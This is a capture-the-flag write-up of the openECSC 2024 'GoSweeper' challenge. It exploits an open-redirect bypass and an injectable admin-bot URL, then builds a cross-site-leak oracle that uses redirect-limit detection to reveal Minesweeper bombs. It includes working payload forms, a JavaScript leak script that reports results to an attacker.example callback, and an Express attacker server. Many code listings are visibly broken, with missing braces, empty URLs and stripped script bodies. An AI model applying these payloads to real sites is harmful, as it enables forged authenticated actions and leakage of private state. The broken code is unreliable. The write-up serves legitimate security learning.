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openECSC 2024 Round 2 Write-up: GoSweeper

2024-05-04 · 29 minute read

#ctf #ctf-writeup #web #golang #xsleaks

This write-up was placed in the top 3 of the best write-up competition for openECSC 2024 Round 2, and is now published on their website as well.

This is a write-up of the “GoSweeper” challenge from Round 2 of openECSC 2024. This challenge gives us a glimpse of side channels on the web, which allow us to infer information which we otherwise would not have access to.

This class of vulnerabilities is called Cross-Site Leaks (or more commonly, XSLeaks), and, sorry for the spoiler, is what we will be taking advantage of in order to get the flag.

This write-up will be an insight into how I approached this problem and successfully solved it, taking way more time than I would like to admit. With that said, there is a lot of Minesweeper gameplay ahead of us, but first, we have to dissect the source code that is given to us.

Throughout this write-up, the URLs of the challenge and the attacker-controlled website are referred to as https://gosweeper.example and https://attacker.example respectively.

The Challenge

Let’s start by taking a look at the challenge, which provides us with a zip file and a challenge URL.

Upon loading the URL, we are greeted with a landing page where we can either login or register. Clicking the register button immediately creates a new user and shows us its ID (a 128-bit hex string). Going back to the landing page reveals a counter of games won (along with total games), as well as a play button. Starting a new game reveals a 7x7 board without any initial discovered tiles, as well as two buttons under it, “Check win” and “Admin check”. Easy enough, I thought, I have played a lot of Minesweeper before. After playing a few games, I came to the conclusion that guessing the first tile correctly is quite difficult, and winning the game is borderline impossible, since there are multiple 50/50 situations. Additionally, there seemed to be a lot of mines, more than you would expect for a board that small.

Top left: landing page; Top center: register success page; Top right: logged-in home page; Bottom: board page
Top left: landing page; Top center: register success page; Top right: logged-in home page; Bottom: board page

Having gotten a grasp of the web interface, it is now time to look into the source code that was given to us. Extracting the zip archive reveals that it contains a Docker setup (thanks) and a Golang application consisting of a single Go file and multiple HTML templates.

├── docker-compose.yml
├── Dockerfile
└── src
   ├── go.mod
   ├── go.sum
   ├── main.go
   └── templates
      ├── board.html
      ├── clone.html
      ├── header.html
      ├── home.html
      ├── login.html
      └── register.html

I have to preface the rest of this write-up by saying that I have little to no experience with Golang, but the challenge code is quite easy to read, and fortunately no weird Go shenanigans were required (I’m thankful for sane languages sometimes; looking at you JavaScript).

My first instinct when approaching web challenges with source is to grep for the flag, which usually gives us a very good overview of the direction we need to take. This challenge is no different, and we found the following in the Go file:

var FLAG string = os.Getenv("FLAG")
// ...

func homeHandler(w http.ResponseWriter, r *http.Request) {
  userid, points, tries, err := getUserAndPoints(r)
  // ...

  flag := ""
  if points >= 20 && points == tries {
    flag = FLAG

  data := struct {
    // ...
    Flag   string
    // ...
    Flag:   flag,

  renderTemplate(w, "home.html", data)

It seems like the flag is shown in the home page once we reach 20 perfect wins, which as mentioned before, is borderline impossible by just playing the game. Great.

After quickly going through the source code, I found two important pieces of information: how the board is generated and what the “Admin check” button does.

The function that generates the board is quite long, but here is a small recap of the algorithm:

  1. Randomly pick a position on the board to be the first bomb.
  2. Pick another random position on the board, and if is next to a bomb (orthogonally; diagonally does not count), place a bomb there.
  3. Repeat the previous step until half of the board is composed of bombs, that is, until there are 25 bombs in the board.
  4. Mark all safe spots neighboring more than 6 bombs as bombs as well (for sides the threshold is more than 3 bombs, while for corners it is more than 2), preventing a single safe spot surrounded by bombs.
Full board generation code
func GenerateBoard() []int {
  board := make([]int, DIM*DIM)

  firsBombX := randInt(0, 1) * (DIM - 1)
  firsBombY := randInt(0, 1) * (DIM - 1)

  firsBombInd := firsBombX*DIM + firsBombY

  board[firsBombInd] = 100

  // put bombs around the first bomb
  for i := 0; i < (DIM * DIM / 2); i++ {

    // get random position
    randPos := randInt(0, DIM*DIM-1)

    // check if the position is already a bomb
    if board[randPos] == 100 {

    // check if the position is close to another bomb

    // get x and y of the random position
    randX := randPos / DIM
    randY := randPos % DIM

    // check up
    nearBomb := false

    if randX > 0 && board[randPos-DIM] == 100 {
      nearBomb = true
    if randX < (DIM-1) && board[randPos+DIM] == 100 {
      nearBomb = true
    if randY > 0 && board[randPos-1] == 100 {
      nearBomb = true
    if randY < (DIM-1) && board[randPos+1] == 100 {
      nearBomb = true

    if nearBomb {
      board[randPos] = 100
    } else {

  changed := true

  for changed {
    changed = false

    // Fill the rest of the board with the number of bombs around
    for i := 0; i < DIM*DIM; i++ {
      if board[i] == 100 {

      x := i / DIM
      y := i % DIM

      count := 0

      if x > 0 {

        // check up
        if board[i-DIM] == 100 {
        // check up left
        if y > 0 && board[i-(DIM+1)] == 100 {
        // check up right
        if y < (DIM-1) && board[i-(DIM-1)] == 100 {
      if x < (DIM - 1) {

        // check down
        if board[i+DIM] == 100 {
        // check down left
        if y > 0 && board[i+DIM-1] == 100 {
        // check down right
        if y < (DIM-1) && board[i+DIM+1] == 100 {
      // check left
      if y > 0 && board[i-1] == 100 {
      // check right
      if y < (DIM-1) && board[i+1] == 100 {

      if count > 6 || ((y == 0 || y == (DIM-1) || x == 0 || x == (DIM-1)) && count > 3 || ((x == 0 || x == (DIM-1)) && (y == 0 || y == (DIM-1))) && count > 2) {
        // fmt.Println("Count: ", count)
        // fmt.Println("Pos: ", i)
        board[i] = 100
        changed = true

      board[i] = count

  bombs := 0
  for i := 0; i < DIM*DIM; i++ {
    if board[i] == 100 {

  // log.Printf("Generated board with %d%% bombs", bombs*100/(DIM*DIM))

  return board

This results in the following game mechanics:

  • Bombs make up 50%-60% of the board;
  • The center of the board is nearly always a bomb;
  • There is usually a “safe” side, where the bombs don’t spread to;
  • All the bombs are connected to each other, which means there are no bombs isolated from the rest of the bombs (this helps decisions on 50/50 situations where one option could have never been generated by this function);
  • There can, however, still exist safe spots isolated from each other.

These mechanics will be important in the future, so keep them in mind.

Admin X-ray view, where it is possible to see the board without solving it
Admin X-ray view, where it is possible to see the board without solving it

Finally, before delving into the exploitation of this app, let’s take a look at what the “Admin check” button does. When clicked, it creates a new admin account and invokes a headless Chromium browser that performs the following actions:

  1. Login as the admin
  2. Sleep for 1 second
  3. Clone the board of the user
  4. Sleep for 1 second
  5. Open the board of the user with the xray option (shows where the bombs are)
  6. Sleep for 4 seconds
func checkBoardHandler(w http.ResponseWriter, r *http.Request) {
  // ...
  data := struct {
    Actions []interface{} `json:"actions"`
    Browser string        `json:"browser"`
    Actions: []interface{}{
        "type": "request",
        "url":  CHALL_URL + "/login",
        "type":    "type",
        "element": "#userid",
        "value":   botUserId,
        "type":    "click",
        "element": "#submitbtn",
        "type": "sleep",
        "time": 1,
        "type": "request",
        "url":  CHALL_URL + "/clone?cloneid=" + cloneid,
        "type": "sleep",
        "time": 1,
        "type": "request",
        "url":  CHALL_URL + "/board?xray=1",
        "type": "sleep",
        "time": 4,
    Browser: "chrome",
  // ...

Additionally, further inspection of the clone endpoint reveals that each board can only be cloned up to 5 times, which is reset when a new game is started.

This gives us a very strong hint that we must somehow take advantage of the bot to extract information about our own game.

Investigating Attack Vectors

Now that we have an overview of the challenge, we need to figure out which attack vectors exist.

Cross-Site Scripting (XSS)

Scrolling through the code, the first thing that catches my attention is this middleware setting certain security headers. Interestingly, the CSP header seems to be commented out, so I thought there might be some kind of XSS that we have to exploit.

func securityHeadersMiddleware(next http.Handler) http.Handler {
  return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
    // Set security headers
    w.Header().Set("X-Frame-Options", "DENY")
    w.Header().Set("X-XSS-Protection", "0")
    w.Header().Set("X-Content-Type-Options", "nosniff")
    w.Header().Set("Referrer-Policy", "strict-origin-when-cross-origin")
    w.Header().Set("Content-Type", "text/html; charset=UTF-8")
    w.Header().Set("Strict-Transport-Security", "max-age=63072000; includeSubDomains; preload")
    // I have some inline scripts in the templates, who cares about CSP anyway
    // w.Header().Set("Content-Security-Policy", "script-src 'self';")
    w.Header().Set("Cross-Origin-Opener-Policy", "same-origin")
    w.Header().Set("Cross-Origin-Embedder-Policy", "require-corp")
    w.Header().Set("Cross-Origin-Resource-Policy", "same-site")
    w.Header().Set("Permissions-Policy", "geolocation=(), camera=(), microphone=()")

    next.ServeHTTP(w, r)

However, it seems like the challenge author was just lazy (or wanted to throw us off), because looking through the HTML templates did not show anything promising. There doesn’t seem to be any variable that we control; the only data we can directly change is the board itself, which is encoded as an integer array, meaning there is no way to inject a string there.

Server-Side Template Injection (SSTI)

Since there were HTML templates involved, I then looked into the function that handles their rendering, hoping to find a vulnerability there. While it seemed secure at first glance, as I am not very experienced with Go I looked up SSTI examples in Go to make sure it was sound.

func renderTemplate(w http.ResponseWriter, templateFile string, data interface{}) {
  // Parse the template file
  tmpl, err := template.New(templateFile).Funcs(template.FuncMap{"mod": func(i, j int) int { return i % j }}).ParseFiles("templates/"+templateFile, "templates/header.html")
  if err != nil {
    http.Error(w, "Internal Server Error", http.StatusInternalServerError)

  // Execute the template with the data
  err = tmpl.Execute(w, data)
  if err != nil {
    http.Error(w, "Internal Server Error", http.StatusInternalServerError)

Similarly to XSS, there doesn’t seem to be anything exploitable here, since we don’t control the templateFile variable.

Redirect Middleware

However, one middleware caught my attention, since it handles user input. This middleware is responsible for redirecting the user, upon login, to the link pointed by the redirect query parameter. This means that the URL https://gosweeper.example?redirect=/board would redirect any logged in user to /board.

func redirectMiddleware(next http.Handler) http.Handler {
  return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
    urlto := r.URL.Query().Get("redirect")
    if urlto != "" {
      // check if the user is authenticated
      // ...

      a, err := url.Parse(urlto)

      if err == nil {
        // accept only http and https or relative url
        if a.Scheme != "" && a.Scheme != "http" && a.Scheme != "https" {
          http.Error(w, "URL parameter is invalid", http.StatusBadRequest)

        fmt.Println("Scheme: ", a.Scheme)
        fmt.Println("Host: ", a.Host)
        fmt.Println("HOST CHALL: ", r.Host)

        // only accept same host
        if a.Scheme != "" && a.Host != r.Host {
          http.Error(w, "URL parameter is invalid", http.StatusBadRequest)

      if err != nil {

      http.Redirect(w, r, urlto, http.StatusFound)
    next.ServeHTTP(w, r)

As we can see from the code, there are certain checks in place to make sure this is either a relative URL or an absolute URL matching the challenge origin (i.e., gosweeper.example). Despite this, it is still possible to bypass these protections, since browsers interpret an URL starting with double slashes as absolute, but it does not have any scheme (i.e., its scheme is inferred from the scheme of the current website). For this reason, the URL causes a redirect to https://attacker.example. Now we just need to find a way to take advantage of this behaviour…

Admin Bot

Further inspection of the aforementioned admin check feature reveals that we control part of one of the URLs the bot (headless Chromium browser) visits.

func checkBoardHandler(w http.ResponseWriter, r *http.Request) {
  // ...

  // Parse the form
  err = r.ParseForm()
  if err != nil {
    http.Error(w, "Internal Server Error", http.StatusInternalServerError)

  cloneid := r.PostFormValue("cloneid")

  if cloneid == "" {
    s, err := sessionStore.Get(r, "session")
    if err != nil {
      http.Error(w, "Internal Server Error", http.StatusInternalServerError)

    cloneid, _ = s.Values["userid"].(string)

    if cloneid == "" {
      http.Error(w, "Bad Request", http.StatusBadRequest)

  // Call the bot
  data := struct {
    Actions []interface{} `json:"actions"`
    Browser string        `json:"browser"`
    Actions: []interface{}{
      // ...
        "type": "request",
        "url":  CHALL_URL + "/clone?cloneid=" + cloneid,
      // ...
    Browser: "chrome",

  // ...

The endpoint accepts a cloneid parameter given in the POST request’s body, which if empty just defaults to the ID of the current user. This parameter is then passed as a query parameter to a URL the bot visits, but with no escaping whatsoever. This means that we can pass additional query parameters (e.g., the aforementioned redirect parameter) and get the bot to visit our own website, simply by sending cloneid=something&redirect=//attacker.example in the body of the request.

We can see this in action by sending a request using the following code in the browser’s console (or using your favourite HTTP client) and taking a look at the headless Chromium’s logs:

fetch(`/checkboard`, {
  method: 'POST',
  body: new URLSearchParams({
    cloneid: 'something&redirect=//attacker.example',
[INFO] time=4
[INFO] Sleeping for 4 seconds...
[DEBUG] What follows is a list of all the requests which have been performed by the browser:
[DEBUG]   - 200
[DEBUG]   - 200
[DEBUG]   - 200
[DEBUG]   - 200
[DEBUG]   - 200
[DEBUG]   - 200 https://gosweeper.example/login
[DEBUG]   - 200
[DEBUG]   - 200
[DEBUG]   - 404 https://gosweeper.example/favicon.ico
[DEBUG]   - 200
[DEBUG]   - 302 https://gosweeper.example/login
[DEBUG]   - 200 https://gosweeper.example/
[DEBUG]   - 302 https://gosweeper.example/clone?cloneid=something&redirect=//attacker.example
[DEBUG]   - 200 https://attacker.example/
[DEBUG]   - 302 https://gosweeper.example/board?xray=1
[DEBUG]   - 302 https://gosweeper.example/newboard
[DEBUG]   - 200 https://gosweeper.example/board
[DEBUG]   - 200
[DEBUG]   - 200

It is also worth noting that, as evidenced by the request to /newboard, the board isn’t being cloned, since the redirect middleware runs before the actual endpoint handler.

Taking Control of the Admin Bot

Now that we can get the bot to visit our website (at least for 1 second), we need to figure out what to do with this capability. There are multiple interesting pieces of information that would be helpful to get ahold of, such as the bot ID (which has unlimited X-ray access) or the board in the X-ray view. Unfortunately, there are various countermeasures put in place (mainly by the browser) to make sure we cannot access this information:

  • No Cross-Origin Resource Sharing (CORS) header is present, which means that, while we are able to make requests to https://gosweeper.example, the browser does not allow us to read anything from the response (including its status code);
  • Additionally, the cookie’s SameSite attribute is unset, which defaults to Lax. This means that while we can make requests, they will be unauthenticated, which is rather useless. The only requests that are authentication are top-level navigations, that is, changing the page URL to that of https://gosweeper.example/...;
  • Other security headers are also present, such as the Cross-Origin Opener Policy (COOP) header and the Cross-Origin Resource Policy (CORP) header. The former prevents an attacker from opening a pop-up and keeping a reference to its window object, while the latter prevents any webpage from loading resources from the challenge’s origin (e.g., images). None of these cause significant headaches, since for the former the browser already prevents cross-origin accesses to the DOM, and for the latter the lax cookie policy prevents the cookies from being sent at all.

Fortunately for us, there is still something we can use to make authenticated requests to GoSweeper, even if we cannot (directly) obtain any information: While on a user-controlled browser pop-ups are blocked by default, on headless Chromium they are allowed, so we can open as many new tabs as we want. This is useful, for example, to actually clone the board, which only requires a GET request. The following attacker payload would result in getting the bot to clone the board as it was supposed to do before we forced a redirect, since it opens a new tab (top-level navigation) which includes the authentication cookie.


Alternatively, and perhaps more flexibly, we can also use HTML forms, which allow us to do POST requests as well. As such, the example above can be rewritten as (notice target="_blank" in the form HTML to open it in a new tab):

<form id="form-clone" method="get" action="https://gosweeper.example/clone" target="_blank">
  <input type="hidden" name="cloneid" value="fe24ecea6cf48d9604127b1204bb24fd" />


We can see from the browser logs that the bot indeed successfully clones the board, since the request to /board?xray=1 no longer redirects to /newboard!

[DEBUG] What follows is a list of all the requests which have been performed by the browser:
// ...
[DEBUG]   - 302 https://gosweeper.example/clone?cloneid=something&redirect=//attacker.example
[DEBUG]   - 200 https://attacker.example/
[DEBUG]   - 200 https://gosweeper.example/clone?cloneid=fe24ecea6cf48d9604127b1204bb24fd
[DEBUG]   - 404 https://attacker.example/favicon.ico
// ...
[DEBUG]   - 200 https://gosweeper.example/board?xray=1
[DEBUG]   - 200
[DEBUG]   - 200

Now that we have successfully cloned the board, while still having an open tab with our malicious website open, we can try to make certain requests in order to hopefully extract information about the state of the board. Given that all traditional methods of getting information (e.g., sending a request using fetch) are blocked, we are left with just one option: side channels.


As previously mentioned, side channels on the web are commonly referred to as Cross-Site Leaks (XSLeaks), and they allow an attacker (us) to infer information present in another origin (GoSweeper). Going through the XSLeaks Wiki reveals a number of approaches one could take, which mainly rely on having the website and/or browser exhibit different behaviour based on the state of the board.

To take advantage of this, we first need to find a scenario in which a request is handled differently depending on certain actions. The challenge gives us the hint that we might not be able to get the whole board at once, since we are limited to 5 clones per board. Therefore, it is likely that we will only be able to infer whether a certain tile is a bomb.

Upon inspecting the source code again, and recalling the already observed behaviour, the /board endpoint stands out as a good candidate, since it causes a redirect to /newboard if there isn’t an active game (i.e., right after we lose). This redirect behaviour can be detected by exhausting the browser’s redirect limit, which will cause an error if /board redirects, but proceed normally otherwise. More concretely, the Chromium browser has a limit of 20 redirects (in one go); if we perform 19 redirects somewhere else and then redirect to /board, we are able to know if the logged in user has an active game or not.

For this side channel to be useful, we first need a way to manipulate the state in a way that will give us relevant information. To achieve this, we can make a guess on a tile (using the /guess endpoint): if that guess is a bomb, the game will end and the bot user will not have an active game anymore; otherwise, the tile will be revealed and nothing else will happen. Using this, we now have a clear way to figure out whether a given tile is a bomb (i.e., an oracle).

So, recapping the plan:

  1. Clone the board using the admin bot;
  2. Make the bot take a guess on the tile we want to reveal;
  3. Make the bot navigate to the board page and detect whether there is an active game, revealing the contents of the guessed tile;
  4. Send this information back to us.

These are a lot of actions to take in just one second (and the redirects, especially, seem to take a lot of time to execute in the headless browser), so we need a way to persist after that. Thankfully, this is not very difficult, since we can just open a new tab from the initial page, giving us another 4 seconds until the browser is killed:

<form id="form-clone" method="get" action="https://gosweeper.example/clone" target="_blank">
  <input type="hidden" name="cloneid" value="fe24ecea6cf48d9604127b1204bb24fd" />


Since we are doing further requests mutating the state of the board, we need to wait for the /board?xray=1 request to be sent first, otherwise it would generate a new board if the tile we are guessing is a bomb, rendering the side channel useless. My first approach for this was to use setTimeout, waiting a certain number of milliseconds, but this proved to be quite unreliable, since the time the new tab takes to load can vary. To combat this problem, I injected an event handler in the “main” tab that would tell this new /persist.html tab that it was navigating somewhere else (i.e., the deprecated unload event). This is only possible because both pages are from the same origin (i.e., https://attacker.example), so window.opener in the second tab points back to the first one and is able to interact with it.

As such, this is what our persist.html looks like now, making a guess on tile 0 (the top-left corner) after the bot navigates away from its opener:

<form id="form-guess" method="post" action="https://gosweeper.example/guess" target="_blank">
  <input type="hidden" name="guess" value="0" />

  window.opener.onunload = () => {
    // TODO


Again, looking at the headless Chromium bots reveals that this is working as intended, with the request to /guess being sent immediately after the one sent to /board?xray=1.

[DEBUG] What follows is a list of all the requests which have been performed by the browser:
// ...
[DEBUG]   - 302 https://gosweeper.example/clone?cloneid=something&redirect=//attacker.example
[DEBUG]   - 200 https://attacker.example/
[DEBUG]   - 200 https://gosweeper.example/clone?cloneid=fe24ecea6cf48d9604127b1204bb24fd
[DEBUG]   - 200 https://attacker.example/persist.html
[DEBUG]   - 404 https://attacker.example/favicon.ico
[DEBUG]   - 200
[DEBUG]   - 200
[DEBUG]   - 200 https://gosweeper.example/board?xray=1
[DEBUG]   - 200 https://gosweeper.example/guess
[DEBUG]   - 200
[DEBUG]   - 200

The only thing left now is to detect whether there is still an active game after making the guess. Since we cannot use fetch, given that it would not include a cookie, we have to rely on opening a new tab once again. Here, an interesting behaviour emerges: if we reach the maximum number of redirects, the window’s origin will be about:blank, which is accessible from any origin; otherwise, the origin will be https://gosweeper.example and we will not be able to access any content of the window. Therefore, to know if a redirect is successful or not, we just have to poll the w.window object and check if it becomes null; if it does, we have lost access to the window reference, meaning the redirect was successful (and there is no bomb).

In order to achieve the 19 redirects (well, 18, since opening the new tab also counts as a redirect, apparently) before the final destination, we can use XSLeaks’ own demo service, which provides us with the<url> endpoint (I’ve tried creating my own with Caddy, but it ended up not being reliable in the challenge’s instance).

<form id="form-guess" method="post" action="https://gosweeper.example/guess" target="_blank">
  <input type="hidden" name="guess" value="0" />

<form id="form-redirect" method="get" action="" target="redirect-window">
  <input type="hidden" name="n" value="18" />
  <input type="hidden" name="url" value="https://gosweeper.example/board" />

  const sleep = t => new Promise((resolve) => setTimeout(resolve, t));

  const callback = w => {
    const result = w.window == null ? 'safe' : 'bomb';

  let w ='', 'redirect-window');

  const leak = async () => {
    await sleep(2500);
    await sleep(100);
    await sleep(100);
    // (repeat a few times)

  window.opener.onunload = () => {

Notice some optimisations that were made in order to make sure we always™ get the correct result:

  • A new tab is open as soon as the page is loaded, even before the window.opener.onunload event handler is fired, in order to reduce the time it takes to initiate the request of the redirects;
  • The redirects are slow, so starting them at the same time as the guess is not a problem and also helps with making sure it finishes within the 4 seconds that we have;
  • We first wait 2.5 seconds after sending back the status of the window, but in some cases this might not be enough time for all the redirects to finish, so we keep sending requests at 100ms intervals afterwards (until the browser process is abruptly terminated).

This correctly identifies whether the tile is a bomb. Here is a log of the request in case of a bomb:

[DEBUG] What follows is a list of all the requests which have been performed by the browser:
// ...
[DEBUG]   - 302 https://gosweeper.example/clone?cloneid=something&redirect=//attacker.example
[DEBUG]   - 200 https://attacker.example/
[DEBUG]   - 200 https://gosweeper.example/clone?cloneid=fe24ecea6cf48d9604127b1204bb24fd
[DEBUG]   - 200 https://attacker.example/persist.html
[DEBUG]   - 404 https://attacker.example/favicon.ico
[DEBUG]   - 200
[DEBUG]   - 200
[DEBUG]   - 200 https://gosweeper.example/board?xray=1
[DEBUG]   - 200 https://gosweeper.example/guess
[DEBUG]   - 200
[DEBUG]   - 200
[DEBUG]   - 302
// ...
[DEBUG]   - 302
[DEBUG]   - 200 https://attacker.example/callback/bomb
[DEBUG]   - 302
[DEBUG]   - 302
[DEBUG]   - 302
[DEBUG]   - 302
[DEBUG]   - 302 https://gosweeper.example/board
[DEBUG]   - 200 https://attacker.example/callback/bomb

And here is the same thing when it is a safe spot:

[DEBUG] What follows is a list of all the requests which have been performed by the browser:
// ...
[DEBUG]   - 302 https://gosweeper.example/clone?cloneid=something&redirect=//attacker.example
[DEBUG]   - 200 https://attacker.example/
[DEBUG]   - 200 https://gosweeper.example/clone?cloneid=fe24ecea6cf48d9604127b1204bb24fd
[DEBUG]   - 200 https://attacker.example/persist.html
[DEBUG]   - 404 https://attacker.example/favicon.ico
[DEBUG]   - 200
[DEBUG]   - 200
[DEBUG]   - 200 https://gosweeper.example/board?xray=1
[DEBUG]   - 200 https://gosweeper.example/guess
[DEBUG]   - 200
[DEBUG]   - 200
[DEBUG]   - 302
// ...
[DEBUG]   - 302
[DEBUG]   - 200 https://attacker.example/callback/bomb
[DEBUG]   - 302
[DEBUG]   - 302
[DEBUG]   - 302
[DEBUG]   - 302
[DEBUG]   - 200 https://gosweeper.example/board
[DEBUG]   - 200
[DEBUG]   - 200
[DEBUG]   - 200 https://attacker.example/callback/safe

Awesome! Now we just need to put this together to be able to quickly know whether any tile of our choosing is a bomb.

Tying It All Together

To more efficiently trigger the bomb oracle, we can create a Node.js app using Express and Mustache that receives the tile to be explored through the redirect, and prints the outcome of the callback:

import express from 'express';
import mustacheExpress from 'mustache-express';

const CHALL_HOST = "https://gosweeper.example";
const CALLBACK_URL = "https://attacker.example/xsleaks-callback";

const userId = "fe24ecea6cf48d9604127b1204bb24fd";

const app = express();
const port = 3000;

app.engine("mustache", mustacheExpress());

app.set('views', "./templates");
app.set('view engine', 'mustache');

app.get('/entry/:tile', (req, res) => {
  const { tile } = req.params;
  res.render("entry", { CHALL_HOST, userId, tile });

app.get('/xsleaks/:tile', (req, res) => {
  const { tile } = req.params;
  res.render("xsleaks", { CHALL_HOST, CALLBACK_URL, tile });
});'/xsleaks-callback/:result', (req, res) => {
  const { result } = req.params;

app.listen(port, () => {
  console.log(`Listening on port ${port}`);
Mustache templates


<form id="form-clone" method="get" action="{{CHALL_HOST}}/clone" target="_blank">
  <input type="hidden" name="cloneid" value="{{userId}}" />



<form id="form-guess" method="post" action="{{CHALL_HOST}}/guess" target="_blank">
  <input type="hidden" name="guess" value="{{tile}}" />

<form id="form-callback" method="get" action="" target="redirect-window">
  <input type="hidden" name="n" value="18" />
  <input type="hidden" name="url" value="{{CHALL_HOST}}/board" />

  const sleep = t => new Promise((resolve) => setTimeout(resolve, t));

  const callback = w => {
    const result = w.window == null ? 'safe' : 'bomb';

  let w ='', 'redirect-window');

  const leak = async () => {
    await sleep(2500);
    await sleep(100);
    await sleep(100);
    await sleep(100);
    await sleep(100);

  window.opener.onunload = () => {

This application allows us to redirect the bot to https://attacker.example/entry/<tile>, triggering the XSLeaks exploit, which will (eventually) print out “safe” or “bomb”.

Finally, since sending these requests manually would be tiring, we can declare a JavaScript function in our browser’s console that simply takes the index of the tile we want to reveal and sends the appropriate request:

const oracle = (tile) => fetch(`/checkboard`, {
  method: 'POST',
  body: new URLSearchParams({
    cloneid: `something&redirect=//attacker.example/entry/${tile}`,

Running oracle(0) should, within about 10 seconds, tell us whether the tile on the top-left corner is a bomb, printing this information to to the terminal running our Node.js application.

Play Strategies

As you might recall, in order to get the flag we need to get 20 perfect games, which would be easy to do using the oracle in combination with some automated solver. However, I was too lazy to implement one, so I ended up playing the 20 games by hand, which took way too long, but was definitely faster than trying to implement a solver for it. Here are some strategies that I adopted:

  • First, I made a drawing of the board with the tile numbers, which made it easier to use the oracle on the correct tile without having to count each time;
  • Second, it is possible to restart the board whenever we want, by calling the /newboard GET endpoint, without it incurring a loss, which is useful for when there is a 50/50 and we are out of oracles (recall that we have 5 per game);
  • Third, I always start with the top-left corner and restart the board if it is a bomb, maximising the number of available oracles throughout the game;
  • Fourth, it is important to keep in mind the aforementioned peculiarities of the board generation function, which help on certain 50/50 situations.

Using these strategies, it is quite easy to get the 20 wins, even if it takes a while. Below is a sample gameplay:

Sample gameplay animation using the oracle for tiles 0, 6, 42, 45 and 40
Sample gameplay animation using the oracle for tiles 0, 6, 42, 45 and 40

After repeating the process 20 times, we get the flag on the home page:

The homepage showing the flag after winning 20 out of 20 games
The homepage showing the flag after winning 20 out of 20 games

Final Remarks

Solving this challenge makes us take a deep dive into navigation-related side channels on the web, inferring information that would otherwise not be possible to extract. Even with all the sandboxing built into the browser, it is still not enough to properly isolate different origins from each other.

While I hit many road blocks while trying to solve this challenge, it ended up being very fun, and I definitely have deepened my knowledge in XSLeaks.